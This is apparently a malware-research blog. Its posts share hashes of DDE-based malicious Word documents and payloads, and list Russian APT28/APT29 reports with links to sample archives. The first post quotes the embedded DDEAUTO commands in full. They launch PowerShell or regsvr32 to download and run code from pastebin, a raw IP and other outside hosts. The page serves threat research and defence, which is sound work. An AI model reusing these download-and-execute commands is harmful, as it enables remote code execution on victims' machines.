Clicky

Wednesday, October 18, 2017

DDE Command Execution malware samples






Here are a few samples related to the recent DDE Command execution






Reading:
10/18/2017 InQuest/yara-rules 
10/18/2017 https://twitter.com/i/moments/918126999738175489 


Download


File information
List of available files:
Word documents:
bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb
a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428
b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568
9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862
7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280
313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065
9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d
8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184
11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13
bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9

Payload 
8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf
2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c
316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea
5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f
fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 


File details with MD5 hashes:
Word documents:
1. bf38288956449bb120bae525b6632f0294d25593da8938bbe79849d6defed5cb EDGAR_Rules.docx
bcadcf65bcf8940fff6fc776dd56563 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://pastebin.com/raw/pxSE2TJ1')) ")

2. 1a1294fce91af3f7e7691f8307d07aebd4636402e4e6a244faac5ac9b36f8428 EDGAR_Rules_2017.docx
 2c0cfdc5b5653cb3e8b0f8eeef55fc32 ( DDEAUTO c:\\windows\\system32\\cmd.exe "/k powershell -C ;echo \"https://sec.gov/\";IEX((new-object net.webclient).downloadstring('https://trt.doe.louisiana.gov/fonts.txt')) ")

3 4b68b3f98f78b42ac83e356ad61a4d234fe620217b250b5521587be49958d568 SBNG20171010.docx
8be9633d5023699746936a2b073d2d67 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://104.131.178.222/s.ps1');powershell -Command $e. 

4. 9d67659a41ef45219ac64967b7284dbfc435ee2df1fccf0ba9c7464f03fdc862 Plantilla - InformesFINAL.docx
78f07a1860ae99c093cc80d31b8bef14 ( DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe $e=new-object -com internetexplorer.application; $e.visible=$true; $e.navigate2(' https://i.ytimg.com/vi/ErLLFVf-0Mw/maxresdefault.jpg '); powershell -e $e " 

5. 7777ccbaaafe4e50f800e659b7ca9bfa58ee7eefe6e4f5e47bc3b38f84e52280 
 aee33500f28791f91c278abb3fcdd942 (DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://www.filefactory.com/file/2vxfgfitjqrf/Citibk_MT103_Ref71943.exe');powershell -e_

6. 313fc5bd8e1109d35200081e62b7aa33197a6700fc390385929e71aabbc4e065 Giveaway.docx
507784c0796ffebaef7c6fc53f321cd6 (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe" "/c regsvr32 /u /n /s /i:\"h\"t\"t\"p://downloads.sixflags-frightfest.com/ticket-ids scrobj.dll" "For Security Reasons")


7. 9fa8f8ccc29c59070c7aac94985f518b67880587ff3bbfabf195a3117853984d  Filings_and_Forms.docx
47111e9854db533c328ddbe6e962602a (DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden -C $e=(new-object system.net.webclient).downloadstring('http://goo.gl/Gqdihn');powershell.exe -e $e # " "Filings_and_Forms.docx")

8. 8630169ab9b4587382d4b9a6d17fd1033d69416996093b6c1a2ecca6b0c04184 ~WRD0000.tmp
47111e9854db533c328ddbe6e962602a


9. 11a6422ab6da62d7aad4f39bed0580db9409f9606e4fa80890a76c7eabfb1c13 ~WRD0003.tmp
d78ae3b9650328524c3150bef2224460


10. bd61559c7dcae0edef672ea922ea5cf15496d18cc8c1cbebee9533295c2d2ea9 DanePrzesylki17016.doc
5786dbcbe1959b2978e979bf1c5cb450


Payload Powershell

1. 8c5209671c9d4f0928f1ae253c40ce7515d220186bb4a97cbaf6c25bd3be53cf fonts.txt

2 2330bf6bf6b5efa346792553d3666c7bc290c98799871f5ff4e7d44d2ab3b28c - powershell script from hxxp://citycarpark.my/components/com_admintools/mscorier

Payload PE

1. 316f0552684bd09310fc8a004991c9b7ac200fb2a9a0d34e59b8bbd30b6dc8ea Citibk_MT103_Ref71943.exe
3a4d0c6957d8727c0612c37f27480f1e

2. 5d3b34c963002bd46848f5fe4e8b5801da045e821143a9f257cb747c29e4046f FreddieMacPayload
 4f3a6e16950b92bf9bd4efe8bbff9a1e

3. fe72a6b6da83c779787b2102d0e2cfd45323ceab274924ff617eb623437c2669 s50.exe  Poland payload
09d71f068d2bbca9fac090bde74e762b



Friday, March 31, 2017

Part II. APT29 Russian APT including Fancy Bear





This is the second part of Russian APT series.

"APT29 - The Dukes Cozy Bear: APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008.1210 This group reportedly compromised the Democratic National Committee starting in the summer of 2015" (src.  Mitre ATT&CK)

Please see the first post here: Russian APT - APT28 collection of samples including OSX XAgent




I highly recommend reading and studying these resources first:

List of References (and samples mentioned) listed from oldest to newest:

  1. 2012-02 FSecure. COZYDUKE
  2. 2013-02_Crysys_Miniduke Indicators
  3. 2013-04_Bitdefender_A Closer Look at MiniDuke
  4. 2014-04 FSecure_Targeted Attacks and Ukraine
  5. 2014-05_FSecure.Miniduke still duking it out
  6. 2014-07_Kaspersky_Miniduke is back_Nemesis Gemina and the Botgen Studio
  7. 2014-07_Kaspersky_The MiniDuke Mystery PDF 0-day
  8. 2014-11_FSecure_OnionDuke APT Attacks Via the Tor Network
  9. 2014_FSecure_Cosmicduke Cosmu with a twist of MiniDuke
  10. 2015-04_Kaspersky_CozyDuke-CozyBear
  11. 2015-07_FSecure_Duke APT Groups Latest Tools Cloud Services and Linux Support
  12. 2015-07_Fireeye_Hammertoss_Stealthy_tactics_define_Russian_Cyber
  13. 2015-07_Kaspersky_Minidionis one more APT with a usage of cloud drives
  14. 2015-07_PaloAlto_Tracking_MiniDionis
  15. 2015-07_Palo_Alto_Unit 42 Technical Analysis Seaduke
  16. 2015-07_Symantec_Seaduke latest weapon in the Duke armory
  17. 2015-08_Prevenity Stealing data from public institutions
  18. 2015-09_FSecure_THE DUKES7 years of Russian cyberespionage
  19. 2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee
  20. 2016-11_Volexity_PowerDukePostElection
  21. 2016-12_Chris_Grizzly SteppeLighting up Like A Christmas Tree
  22. 2017-03 Fireeye APT29 Domain Fronting With TOR
  23. Fancy Bear source code 

Download


Download sets (matching research listed above). Email me if you need the password
          Download all files/folders listed (MB)


Monday, March 20, 2017

DeepEnd Research: Analysis of Trump's secret server story


 We posted our take on the Trump's server story. If you have any feedback or corrections, send me an email (see my blog profile on Contagio or DeepEnd Research)

Analysis of Trump's secret server story...



Monday, February 20, 2017

Part I. Russian APT - APT28 collection of samples including OSX XAgent


 This post is for all of you, Russian malware lovers/haters. Analyze it all to your heart's content. Prove or disprove Russian hacking in general or DNC hacking in particular, or find that "400 lb hacker" or  nail another country altogether.  You can also have fun and exercise your malware analysis skills without any political agenda.



The post contains malware samples analyzed in the APT28 reports linked below. I will post APT29 and others later.




Read about groups and types of targeted threats here: Mitre ATT&CK

List of References (and samples mentioned) listed from oldest to newest:

  1. APT28_2011-09_Telus_Trojan.Win32.Sofacy.A
  2. APT28_2014-08_MhtMS12-27_Prevenity
  3. APT28_2014-10_Fireeye_A_Window_into_Russia_Cyber_Esp.Operations
  4. APT28_2014-10_Telus_Coreshell.A
  5. APT28_2014-10_TrendMicro Operation Pawn StormUsing Decoys to Evade Detection
  6. APT28_2015-07_Digital Attack on German Parliament
  7. APT28_2015-07_ESET_Sednit_meet_Hacking
  8. APT28_2015-07_Telus_Trojan-Downloader.Win32.Sofacy.B
  9. APT28_2015-09_Root9_APT28_Technical_Followup
  10. APT28_2015-09_SFecure_Sofacy-recycles-carberp-and-metasploit-code
  11. APT28_2015-10_New Adobe Flash Zero-Day Used in Pawn Storm
  12. APT28_2015-10_Root9_APT28_targets Financial Markets
  13. APT28_2015-12_Bitdefender_In-depth_analysis_of_APT28–The_Political_Cyber-Espionage
  14. APT28_2015-12_Kaspersky_Sofacy APT hits high profile targets
  15. APT28_2015_06_Microsoft_Security_Intelligence_Report_V19
  16. APT28_2016-02_PaloAlto_Fysbis Sofacy Linux Backdoor
  17. APT29_2016-06_Crowdstrike_Bears in the Midst Intrusion into the Democratic National Committee << DNC (NOTE: this is APT29)
  18. APT28_2016-07_Invincea_Tunnel of Gov DNC Hack and the Russian XTunnel
  19. APT28_2016-10_ESET_Observing the Comings and Goings
  20. APT28_2016-10_ESET_Sednit A Mysterious Downloader
  21. APT28_2016-10_ESET_Sednit Approaching the Target
  22. APT28_2016-10_Sekoia_Rootkit analysisUse case on HideDRV
  23. APT28_2017-02_Bitdefender_OSX_XAgent  << OSX XAgent



Download


Download sets (matching research listed above). Email me if you need the password
          Download all files/folders listed (72MB)



Sample list